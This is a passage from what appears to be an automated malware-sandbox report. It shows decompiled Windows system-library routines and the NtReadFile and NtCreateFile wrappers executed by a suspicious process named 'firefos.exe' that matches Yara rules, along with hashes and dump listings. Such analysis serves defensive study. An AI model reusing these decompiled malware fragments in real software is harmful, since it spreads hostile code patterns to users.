						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E021401A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x222793c; // 0x0
								_push(_t85);
								_t44 = E02141F28(_t71);
							} else {
								_t44 = E0213F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02183915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E021C2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0216EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02184FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02193F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02193F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x22220c0;
								if(_t85 != 0x22220c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E021C217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02193F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                              0x0216ec56
                                                                                                                                                              0x0216ec56
                                                                                                                                                              0x0216ec56
                                                                                                                                                              0x0216ec5c
                                                                                                                                                              0x0216ec64
                                                                                                                                                              0x021a23e6
                                                                                                                                                              0x021a23eb
                                                                                                                                                              0x021a23eb
                                                                                                                                                              0x0216ec6a
                                                                                                                                                              0x0216ec6c
                                                                                                                                                              0x0216ec6f
                                                                                                                                                              0x021a23f3
                                                                                                                                                              0x021a23f8
                                                                                                                                                              0x021a23fa
                                                                                                                                                              0x021a23fc
                                                                                                                                                              0x0216ec75
                                                                                                                                                              0x0216ec76
                                                                                                                                                              0x0216ec76
                                                                                                                                                              0x0216ec7b
                                                                                                                                                              0x0216ec7c
                                                                                                                                                              0x0216ec7e
                                                                                                                                                              0x021a2406
                                                                                                                                                              0x021a2407
                                                                                                                                                              0x021a240c
                                                                                                                                                              0x021a240d
                                                                                                                                                              0x021a240d
                                                                                                                                                              0x021a240d
                                                                                                                                                              0x021a2414
                                                                                                                                                              0x021a2417
                                                                                                                                                              0x021a241e
                                                                                                                                                              0x021a2435
                                                                                                                                                              0x021a2438
                                                                                                                                                              0x021a243c
                                                                                                                                                              0x021a243f
                                                                                                                                                              0x021a2442
                                                                                                                                                              0x021a2443
                                                                                                                                                              0x021a2446
                                                                                                                                                              0x021a2449
                                                                                                                                                              0x021a2453
                                                                                                                                                              0x021a2455
                                                                                                                                                              0x021a245b
                                                                                                                                                              0x021a245b
                                                                                                                                                              0x0216eb99
                                                                                                                                                              0x0216eb99
                                                                                                                                                              0x0216eb9c
                                                                                                                                                              0x0216eb9d
                                                                                                                                                              0x0216eb9f
                                                                                                                                                              0x0216eba2
                                                                                                                                                              0x021a2465
                                                                                                                                                              0x021a246b
                                                                                                                                                              0x021a246d
                                                                                                                                                              0x0216eba8
                                                                                                                                                              0x0216eba9
                                                                                                                                                              0x0216eba9
                                                                                                                                                              0x0216ebae
                                                                                                                                                              0x0216ebb3
                                                                                                                                                              0x0216ebb9
                                                                                                                                                              0x0216ebbb
                                                                                                                                                              0x021a2513
                                                                                                                                                              0x021a2514
                                                                                                                                                              0x021a2519
                                                                                                                                                              0x021a251b
                                                                                                                                                              0x0216ec2a
                                                                                                                                                              0x0216ec2d
                                                                                                                                                              0x0216ec33
                                                                                                                                                              0x0216ec36
                                                                                                                                                              0x0216ec3a
                                                                                                                                                              0x0216ec3e
                                                                                                                                                              0x0216ec40
                                                                                                                                                              0x0216ec47
                                                                                                                                                              0x0216ec47
                                                                                                                                                              0x0216ec40
                                                                                                                                                              0x021422c6
                                                                                                                                                              0x0216ebc1
                                                                                                                                                              0x0216ebc1
                                                                                                                                                              0x0216ebc5
                                                                                                                                                              0x0216ec9a
                                                                                                                                                              0x0216ec9a
                                                                                                                                                              0x0216ebd6
                                                                                                                                                              0x0216ebd6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0216ebbb
                                                                                                                                                              0x021a2477
                                                                                                                                                              0x021a247c
                                                                                                                                                              0x021a2486
                                                                                                                                                              0x021a248b
                                                                                                                                                              0x021a2496
                                                                                                                                                              0x021a249b
                                                                                                                                                              0x021a249d
                                                                                                                                                              0x021a24a0
                                                                                                                                                              0x021a24a3
                                                                                                                                                              0x021a24aa
                                                                                                                                                              0x021a24aa
                                                                                                                                                              0x021a24a5
                                                                                                                                                              0x021a24a5
                                                                                                                                                              0x021a24a5
                                                                                                                                                              0x021a24ac
                                                                                                                                                              0x021a24af
                                                                                                                                                              0x021a24b0
                                                                                                                                                              0x021a24b3
                                                                                                                                                              0x021a24b9
                                                                                                                                                              0x021a24ba
                                                                                                                                                              0x021a24bb
                                                                                                                                                              0x021a24c6
                                                                                                                                                              0x021a24cb
                                                                                                                                                              0x021a24cd
                                                                                                                                                              0x021a24d0
                                                                                                                                                              0x021a24d1
                                                                                                                                                              0x021a24d4
                                                                                                                                                              0x021a24d6
                                                                                                                                                              0x021a24d9
                                                                                                                                                              0x021a24d9
                                                                                                                                                              0x021a24dc
                                                                                                                                                              0x021a24df
                                                                                                                                                              0x021a24e1
                                                                                                                                                              0x021a24e7
                                                                                                                                                              0x021a24e9
                                                                                                                                                              0x021a24ec
                                                                                                                                                              0x021a24ef
                                                                                                                                                              0x021a24f2
                                                                                                                                                              0x021a24f2
                                                                                                                                                              0x021a24ef
                                                                                                                                                              0x021a24e7
                                                                                                                                                              0x021a24fa
                                                                                                                                                              0x021a24ff
                                                                                                                                                              0x021a2501
                                                                                                                                                              0x021a2503
                                                                                                                                                              0x021a2506
                                                                                                                                                              0x021a250b
                                                                                                                                                              0x0216eb8c
                                                                                                                                                              0x0216eb93
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0216eb93
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0216eb99
                                                                                                                                                              0x0216ec85
                                                                                                                                                              0x0216ec85
                                                                                                                                                              0x0216ec85
                                                                                                                                                              0x00000000

                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 021A24BD
                                                                                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 021A248D
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 021A24FA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                              • API String ID: 0-3177188983
                                                                                                                                                              • Opcode ID: d9ae5b99addda8a85893a32e3ec7f6358af7279c043f92e9d3cf8ca628b7db55
                                                                                                                                                              • Instruction ID: e8be84a6afaf4a440e90959eecd5aad8adfd86f64e47d676947e5ccc87d46154
                                                                                                                                                              • Opcode Fuzzy Hash: d9ae5b99addda8a85893a32e3ec7f6358af7279c043f92e9d3cf8ca628b7db55
                                                                                                                                                              • Instruction Fuzzy Hash: B141E774A80204AFDB34DF68CC98F6E77AAEF44720F108645F9699B2C0D735E951CB61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0217FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0217FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0217EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0217EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0217685D(_t167, 4) == 0) {
								if(E0217685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0217685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0217685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02158980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0214DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0217EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0217EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                              0x0217fcd1
                                                                                                                                                              0x0217fcd6
                                                                                                                                                              0x0217fcd9
                                                                                                                                                              0x0217fcdc
                                                                                                                                                              0x0217fcdf
                                                                                                                                                              0x0217fce2
                                                                                                                                                              0x0217fce5
                                                                                                                                                              0x0217fce8
                                                                                                                                                              0x0217fceb
                                                                                                                                                              0x0217fced
                                                                                                                                                              0x0217fced
                                                                                                                                                              0x0217fcf3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fcfc
                                                                                                                                                              0x0217fcfe
                                                                                                                                                              0x0217fdc1
                                                                                                                                                              0x021aecbd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeccc
                                                                                                                                                              0x021aeccc
                                                                                                                                                              0x021aecd2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aecdf
                                                                                                                                                              0x021aece0
                                                                                                                                                              0x021aece4
                                                                                                                                                              0x021aeceb
                                                                                                                                                              0x021aecee
                                                                                                                                                              0x021aeca8
                                                                                                                                                              0x021aeca8
                                                                                                                                                              0x021aecaa
                                                                                                                                                              0x0217fd76
                                                                                                                                                              0x0217fd79
                                                                                                                                                              0x0217fdb4
                                                                                                                                                              0x0217fdb5
                                                                                                                                                              0x0217fdb6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fdb6
                                                                                                                                                              0x0217fd7e
                                                                                                                                                              0x021aecfc
                                                                                                                                                              0x0217fe2f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fe2f
                                                                                                                                                              0x021aed08
                                                                                                                                                              0x021aed0f
                                                                                                                                                              0x021aed17
                                                                                                                                                              0x021aed1b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aed1b
                                                                                                                                                              0x0217fd88
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fd94
                                                                                                                                                              0x0217fd99
                                                                                                                                                              0x0217fda1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fdb0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fdb0
                                                                                                                                                              0x021aecbd
                                                                                                                                                              0x0217fdc7
                                                                                                                                                              0x0217fdcb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fdd7
                                                                                                                                                              0x0217fde3
                                                                                                                                                              0x0217fe06
                                                                                                                                                              0x02191fe7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02191fef
                                                                                                                                                              0x02191ff0
                                                                                                                                                              0x02191ff4
                                                                                                                                                              0x02191ff7
                                                                                                                                                              0x02191ffa
                                                                                                                                                              0x02191ffd
                                                                                                                                                              0x02192000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aecf1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aecf1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fe06
                                                                                                                                                              0x0217fde8
                                                                                                                                                              0x0217fdec
                                                                                                                                                              0x0217fdef
                                                                                                                                                              0x0217fdf2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fdf2
                                                                                                                                                              0x0217fdcb
                                                                                                                                                              0x0217fd04
                                                                                                                                                              0x0217fd05
                                                                                                                                                              0x021aec67
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aec6f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aec6f
                                                                                                                                                              0x0217fd13
                                                                                                                                                              0x0217fd3c
                                                                                                                                                              0x0217fd40
                                                                                                                                                              0x021aec75
                                                                                                                                                              0x021aec7a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aec8a
                                                                                                                                                              0x021aec8a
                                                                                                                                                              0x021aec90
                                                                                                                                                              0x021aecb2
                                                                                                                                                              0x0217fd73
                                                                                                                                                              0x0217fd73
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fd73
                                                                                                                                                              0x021aec95
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeca1
                                                                                                                                                              0x021aeca4
                                                                                                                                                              0x021aeca5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aeca5
                                                                                                                                                              0x021aec7a
                                                                                                                                                              0x0217fd4a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fd6e
                                                                                                                                                              0x0217fd6e
                                                                                                                                                              0x0217fd71
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fd71
                                                                                                                                                              0x0217fd4a
                                                                                                                                                              0x0217fd21
                                                                                                                                                              0x0218a3a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0218a3a1
                                                                                                                                                              0x0217fd36
                                                                                                                                                              0x0219200b
                                                                                                                                                              0x02192012
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02192018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02192018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0217fd36
                                                                                                                                                              0x0217fe0f
                                                                                                                                                              0x0217fe16
                                                                                                                                                              0x0218a3ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0218a3b3
                                                                                                                                                              0x0218a3b3
                                                                                                                                                              0x0217fe1f
                                                                                                                                                              0x021aed25
                                                                                                                                                              0x021aed86
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aed91
                                                                                                                                                              0x021aed95
                                                                                                                                                              0x021aed95
                                                                                                                                                              0x021aed9a
                                                                                                                                                              0x021aedad
                                                                                                                                                              0x021aedb3
                                                                                                                                                              0x021aedba
                                                                                                                                                              0x021aedc4
                                                                                                                                                              0x021aedc9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aedcc
                                                                                                                                                              0x021aed2a
                                                                                                                                                              0x021aed55
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aed61
                                                                                                                                                              0x021aed66
                                                                                                                                                              0x021aed6e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aed7d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aed7d
                                                                                                                                                              0x021aed30
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021aed3c
                                                                                                                                                              0x021aed43
                                                                                                                                                              0x021aed4b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __fassign
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3965848254-0
                                                                                                                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                              • Instruction ID: fda8224190449e7c8f4ec7952eeb231996b66c23d445804d3450cee7774c9135
                                                                                                                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                              • Instruction Fuzzy Hash: 2791AE35D8024AEEDF28CF98C8447AFB7B4EF85308F35807AD415A7651EB315A82CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Analysis Process: firefos.exe PID: 2336 Parent PID: 2992 firefos.exeCOMMON

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                                                              0x00418273
                                                                                                                                                              0x0041827f
                                                                                                                                                              0x00418287
                                                                                                                                                              0x00418292
                                                                                                                                                              0x004182ad
                                                                                                                                                              0x004182b5
                                                                                                                                                              0x004182b9

                                                                                                                                                              APIs
                                                                                                                                                              • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID: R=A$R=A
                                                                                                                                                              • API String ID: 2738559852-3742021989
                                                                                                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                              • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                              • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041826B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 23%
                                                                                                                                                              			E0041826B(char __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t19;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				asm("out 0xc3, al");
				 *0x8bec8b55 = __eax;
				_t14 = _a4;
				_t30 = _a4 + 0xc48;
				E00418DC0(_t28, _a4, _t30,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t19 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t29, _t32); // executed
				return _t19;
			}








                                                                                                                                                              0x0041826b
                                                                                                                                                              0x0041826f
                                                                                                                                                              0x00418273
                                                                                                                                                              0x0041827f
                                                                                                                                                              0x00418287
                                                                                                                                                              0x00418292
                                                                                                                                                              0x004182ad
                                                                                                                                                              0x004182b5
                                                                                                                                                              0x004182b9

                                                                                                                                                              APIs
                                                                                                                                                              • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID: R=A$R=A
                                                                                                                                                              • API String ID: 2738559852-3742021989
                                                                                                                                                              • Opcode ID: 3df05c6fe35360bb7dd9194cf5117fff748ab97a6246caca3ee4fcb3d44ba0ab
                                                                                                                                                              • Instruction ID: 29863c55ec3654fb31e14fd286cf64c36a0a3c4f9a7f9d4f48c50ef14b18a2b7
                                                                                                                                                              • Opcode Fuzzy Hash: 3df05c6fe35360bb7dd9194cf5117fff748ab97a6246caca3ee4fcb3d44ba0ab
                                                                                                                                                              • Instruction Fuzzy Hash: 1AF01DB6204144AFCB04DFA9D890CEB77E9EF8C214B15875DFD5D93202C634E855CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                              0x004181cf
                                                                                                                                                              0x004181d7
                                                                                                                                                              0x0041820d
                                                                                                                                                              0x00418211

                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
